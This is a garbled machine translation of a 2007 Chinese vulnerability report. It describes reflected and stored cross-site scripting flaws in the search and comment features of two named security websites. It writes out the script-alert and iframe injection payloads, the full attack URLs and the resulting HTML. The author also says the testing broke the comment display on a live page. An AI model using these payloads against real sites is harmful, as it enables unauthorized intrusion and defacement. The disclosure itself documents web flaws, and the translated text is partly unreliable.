Chinese anti-black mesh XSS vulnerabilities security report-vulnerability warning-the black bar safety net

2007-03-26T00:00:00
ID MYHACK58:62200714726
Type myhack58
Reporter 佚名
Modified 2007-03-26T00:00:00

Description

中国 防 黑 网 www.fanghei.net a network security class site, is www. zone-h. com. cn old home, then it really is not a little BUG? And by across the station talking about! To 1. Search file search. php files across the website! This file appears cross-site vulnerability is very common, the Black anti-today I dug up the same cross-point, but from across the station, the station it seems that the file security to be little more than a black anti-High, but still difficult escape across the station. it! The same method, in the homepage article search that the input cross-site code:<script>alert(/lszm/)</script>the present want to just to lose, but the fact they told me not. Because of the limited number of words, want to lose it afford to lose to this? And look at it across the station after is not will appear keyword to call the URL, enter<> Then the generated URL is: http://www.fanghei.net/search.ph ... mit=+%CB%D1+%CB%F7+

To view the source file, got this:

[Copy to clipboard] [ - ]

CODE:

</TR> <TR> <TD height=4 0 align=center><INPUT maxLength=2 0 size=2 0 name=keywords value="<>"> <select name="btype" id="btypeid" onchange=redirect(this. options. selectedIndex) class="input1-bor"> <option value='0'>categories</option>

So it seems that our code is executed, cross-site, and that URL has a call! That also, directly construct cross-site URLS., so I submit: http://www.fanghei.net/search.php?type=title&keywords=<script>alert(/lszm/)</script> Does not appear to cross-site effect, it is also expected thing, a lot of stations have this effect, so we view the source file:

[Copy to clipboard] [ - ]

CODE:

</TR> <TR> <TD height=4 0 align=center><INPUT maxLength=2 0 size=2 0 name=keywords value="<script>alert(/lszm/)</script>"> <select name="btype" id="btypeid" onchange=redirect(this. options. selectedIndex) class="input1-bor"> <option value='0'>categories</option>

As can be seen and multi-as cross-site code is inserted into the go, just be<and>shield, uh, this good office, we again construct the URL: http://www.fanghei.net/search.php?type=title&keywords="><script>alert(/lszm/)</script><" After the submission, and finally met our long-lost cross-site effects: ! 2。 CommentXSScross-site Then observe the site, they found the new world, original they site in the article can also be commented, then comment it, just come up with a post page, in the name and content there are both input<> After the submission, the view source file:

[Copy to clipboard] [ - ]

CODE:

tyle="LEFT: 0px; WIDTH: 580px; WORD-WRAP: break-word">asdfas</td></tr> <tr><td bgcolor="#F6EDC2"><span class="style3"><></span> ( <span class="style5">2007-03-11</span> )</td></tr><tr><td bgcolor="#F5F5F5" style="LEFT: 0px; WIDTH: 580px; WORD-WRAP: break-word"><></td></tr> </table>

See, the content where the cross-site is the conversion. But in front of the names column but not for the corresponding conversion, it appears that the programmers of negligence, and thus we again review, In the Name column input<script>alert(/lszm/)</script> The contents of that column just write it! Submit! Refresh the page, but does not appear to cross-site effect, want to look at the causes, the result to a web page, but found a web page on the display to the comments that the time is over, no longer to display, ! View source file:

[Copy to clipboard] [ - ]

CODE:

<table width="1 0 0%" border="0" cellpadding="5" cellspacing="1" bgcolor="#D8D8D8"> <tr><td bgcolor="#F6EDC2"><span class="style3"><script>alert(/lszm/</span> ( <span class="style5">2007-03-11</span> )</td></tr><tr><td bgcolor="#F5F5F5" style="LEFT: 0px; WIDTH: 580px; WORD-WRAP: break-word">zxvasdv</td></tr> </table>

Seems to be another one of my<script>is converted, this this How to, think A N kind of method, I ultimately did not cross-out effect, but, so we have come up with the damage, because we have to make these articles are not reviews, it seems the damage is not small Ah! Then the message box cross-site test is not successful, then the iframe test can? With this in mind, I re-find the article, didn't I destroy the Articles page, enter: <iframe src=http://www. zmke. com width=9 9 9 height=9 9 9></iframe> After submitted, so display: ! Why the page does not display properly yet, and then check the source files:

[Copy to clipboard] [ - ]

CODE:

<tr><td bgcolor="#F6EDC2"><span class="style3"><iframe src=http://w</span> ( <span class="style5">2007-03-11</span> )</td></tr><tr><td bgcolor="#F5F5F5" style="LEFT: 0px; WIDTH: 580px; WORD-WRAP: break-word"> "asdfasdf" </td></tr>

Read the above code, I thought, this should be although the name of the input box is not what the word count limit, but at the time of submission to verify the file should be limited, it will be excess are directly deleted, it seems to want to break really hard, but this is not yet with the destruction of the effect, although not displayed as a web page, but the web framework is not already in? 3. the ZONE-H across stand Since zone-h home there are cross-site, which shows it seems that the station design of the Cross-Station no concern, then is not zone-h can also be cross-site, access its page, of course, the first sight is that the search of the Black page in the input box, directly enter the'><script>alert(/lszm/)</script><' Submit, then got a call URL http://www.zone-h.com.cn/?key=%2 ... amp;Submit=+Search+ But there is also a cross-site effects: !

So anti-black, their own vulnerability nor less, the mad Khan......